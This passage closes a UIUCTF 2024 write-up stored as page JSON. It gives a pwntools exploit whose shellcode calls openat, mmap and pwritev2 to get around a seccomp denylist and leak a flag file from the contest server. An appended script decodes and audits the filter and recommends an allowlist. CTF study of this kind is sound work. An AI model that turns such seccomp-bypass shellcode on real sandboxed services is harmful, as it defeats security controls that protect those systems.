0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 2: Using openat, mmap, and pwritev2 with an iovec</h3>\n<p>Using the writeup as a reference, I also tried an alternative approach that uses <code class=\"language-text\">mmap</code> instead of <code class=\"language-text\">preadv2</code>.</p>\n<p>By using <code class=\"language-text\">mmap</code>, a file can be mapped into memory and its contents read even when <code class=\"language-text\">read</code> cannot be used.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre 
class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/mman.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token function\">mmap</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> addr<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>length<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> length<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> prot<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/mmap.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">mmap(2) - Linux manual page</a></p>\n<p>Reference: <a href=\"https://corgi-lab.com/programming/c-lang/use-mmap/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Trying <code class=\"language-text\">mmap</code> for file I/O - Corgi Lab. 
~A technical blog for notes~</a></p>\n<p>For that reason, the following code—where the part of the shellcode in Solution 1 that uses <code class=\"language-text\">preadv2</code> is simply replaced with <code class=\"language-text\">mmap</code>—can also retrieve the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> exe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">'./syscalls'</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\nlea rsi, [rip+filename]\nmov rdi, 0\nxor rdx, rdx\nmov rax, 257\nsyscall\n\n// mmap(addr=0, length=0x1000, prot=PROT_READ (1), flags=MAP_PRIVATE (2), fd='rax', offset=0)\npush 2\npop r10\nmov r8, rax\nxor r9, r9\nxor edi, edi\nmov rdx, 1\nmov rsi, 4096\npush 9\npop rax\nsyscall\n\n/* pwritev2(vararg_0=1, vararg_1='rsp', vararg_2=1, vararg_3=-1, vararg_4=0) */\npush 0x100\npush rax\nmov r10, -1\nxor r8, r8\nmov rdi, 1\nmov rsi, rsp\nmov rdx, rdi\nmov rax, 328\nsyscall\n\nfilename:\n    .string \"/home/user/flag.txt\"\n\"\"\"</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"syscalls.chal.uiuc.tf\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token 
punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendlineafter<span class=\"token punctuation\">(</span><span class=\"token string\">\"you.\"</span><span class=\"token punctuation\">,</span> shellcode<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><img src=\"/static/dd967deeb31b60eb62e6bb09ee833aeb/d9199/image-20240708195518246.png\" alt=\"image-20240708195518246\" title=\"image-20240708195518246\" loading=\"lazy\" /></p>\n<p>In this code, calling <code class=\"language-text\">mmap</code> with <code class=\"language-text\">PROT_READ</code> on the file descriptor for <code class=\"language-text\">flag.txt</code> maps the file's contents into a readable memory region, and by using that address as the buffer pointed to by <code class=\"language-text\">iov</code>, the flag can be leaked with <code class=\"language-text\">pwritev2</code>.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>Shellcode has a lot of depth.</p>","fields":{"slug":"/ctf-uiuctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-07-09","description":"UIU CTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","English"],"title":"UIU CTF 2024 Writeup","socialImage":{"publicURL":"/static/3cc57840f9adfdecc482e8326c859d5c/ctf-uiuctf-2024.png"}}}},"pageContext":{"slug":"/ctf-uiuctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}
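The decompiled sock_filter words in the Syscalls section and the seccomp-tools listing quoted there describe the same BPF program. The following Python is an added example, not code from the original writeup or the challenge: it decodes those 25 qwords back into instructions, reproduces the listing, runs the filter on constructed seccomp_data records with a small interpreter, and reports which of the syscalls named on this page the denylist actually kills; the syscall-number table is assumed from the standard x86_64 numbering.

```python
"""Decode and audit the seccomp-bpf program installed by the challenge binary."""
import struct

# The 25 struct sock_filter entries (local_d8 .. local_18) copied from the
# decompiled prctl(PR_SET_SECCOMP) setup in the writeup; each qword is
# {u16 code; u8 jt; u8 jf; u32 k} stored little-endian.
FILTER_WORDS = [
    0x400000020, 0xc000003e16000015, 0x20, 0x4000000001000035,
    0xffffffff13000015, 0x120015, 0x100110015, 0x200100015,
    0x11000f0015, 0x13000e0015, 0x28000d0015, 0x39000c0015,
    0x3b000b0015, 0x113000a0015, 0x12700090015, 0x12800080015,
    0x14200070015, 0x1405000015, 0x1400000020, 0x30025,
    0x3000015, 0x1000000020, 0x3e801000025, 0x7fff000000000006, 6,
]
AUDIT_ARCH_X86_64 = 0xc000003e
SECCOMP_RET_ALLOW, SECCOMP_RET_KILL = 0x7fff0000, 0x00000000
# x86_64 syscall numbers named in the listing (assumed from the standard table).
SYSCALLS = {0: "read", 1: "write", 2: "open", 9: "mmap", 17: "pread64",
            19: "readv", 20: "writev", 40: "sendfile", 57: "fork",
            59: "execve", 257: "openat", 275: "splice", 295: "preadv",
            296: "pwritev", 322: "execveat", 327: "preadv2", 328: "pwritev2"}
NR = {name: nr for nr, name in SYSCALLS.items()}
JUMP_OPS = {0x10: ("==", "!="), 0x20: (">", "<="), 0x30: (">=", "<"), 0x40: ("&", "!&")}  # jump-on-true / jump-on-false operators

def decode(word):
    """Split one qword into (code, jt, jf, k) exactly as the kernel reads it."""
    return struct.unpack("<HBBI", struct.pack("<Q", word))

def seccomp_data(nr, args=(), arch=AUDIT_ARCH_X86_64, ip=0):
    """Build the 64-byte struct seccomp_data that BPF_LD|BPF_ABS reads from."""
    args = tuple(args) + (0,) * (6 - len(args))
    return struct.pack("<iIQ6Q", nr, arch, ip, *args)

def run_filter(words, data):
    """Minimal cBPF interpreter: LD|W|ABS, K-operand conditional jumps and RET."""
    prog = [decode(w) for w in words]
    acc = pc = 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        cls, op = code & 0x07, code & 0xf0
        if cls == 0x00 and (code & 0xe0) == 0x20:        # BPF_LD|BPF_W|BPF_ABS
            acc = struct.unpack_from("<I", data, k)[0]
        elif cls == 0x05 and op in JUMP_OPS:              # conditional jump on K
            taken = {0x10: acc == k, 0x20: acc > k, 0x30: acc >= k,
                     0x40: bool(acc & k)}[op]
            pc += jt if taken else jf
        elif cls == 0x06:                                 # BPF_RET with K or A
            return k if (code & 0x18) == 0 else acc
        else:
            raise ValueError(f"unsupported opcode 0x{code:02x} at {pc:04d}")
        pc += 1
    raise ValueError("filter ran off the end of the program")

def describe_load(k):
    """Name the seccomp_data field at byte offset k and say what A now holds."""
    if k < 16:
        name = {0: "sys_number", 4: "arch", 8: "instruction_pointer"}[k]
        return f"A = {name}", name
    idx, high = divmod(k - 16, 8)
    return f"A = args[{idx}]" + (" >> 32" if high else ""), "arg"

def fmt_k(k, a_src):
    """Show k as a syscall name or arch constant when A holds the matching field."""
    if a_src == "sys_number" and k in SYSCALLS:
        return SYSCALLS[k]
    if a_src == "arch" and k == AUDIT_ARCH_X86_64:
        return "ARCH_X86_64"
    return f"0x{k:x}"

def disassemble(words):
    """Render the program in the seccomp-tools style quoted in the writeup."""
    lines, a_src = [], None
    for pc, (code, jt, jf, k) in enumerate(decode(w) for w in words):
        cls, op = code & 0x07, code & 0xf0
        if cls == 0x00 and (code & 0xe0) == 0x20:
            text, a_src = describe_load(k)
        elif cls == 0x05 and op in JUMP_OPS:
            pos, neg = JUMP_OPS[op]
            if jt == 0:   # only the false edge jumps, so print the negated test
                text = f"if (A {neg} {fmt_k(k, a_src)}) goto {pc + 1 + jf:04d}"
            else:
                text = f"if (A {pos} {fmt_k(k, a_src)}) goto {pc + 1 + jt:04d}"
                text += f" else goto {pc + 1 + jf:04d}" if jf else ""
        elif cls == 0x06 and (code & 0x18) == 0:
            names = {SECCOMP_RET_ALLOW: "ALLOW", SECCOMP_RET_KILL: "KILL"}
            text = "return " + names.get(k & 0xffff0000, f"0x{k:08x}")
        else:
            text = "return A" if cls == 0x06 else f"unknown 0x{code:02x}"
        lines.append(f" {pc:04d}: 0x{code:02x} 0x{jt:02x} 0x{jf:02x} 0x{k:08x}  {text}")
    return lines

def killed_syscalls(words):
    """Known syscalls the filter kills for an x86_64 caller whose arguments are all zero."""
    return {name for nr, name in SYSCALLS.items()
            if run_filter(words, seccomp_data(nr)) == SECCOMP_RET_KILL}

if __name__ == "__main__":
    print("\n".join(disassemble(FILTER_WORDS)))
    print("killed:", sorted(killed_syscalls(FILTER_WORDS)))
```

Because the policy is a denylist, the audit shows openat, mmap, preadv2 and pwritev2 passing straight through; an allowlist of only the calls the binary needs is the usual fix for this class of gap.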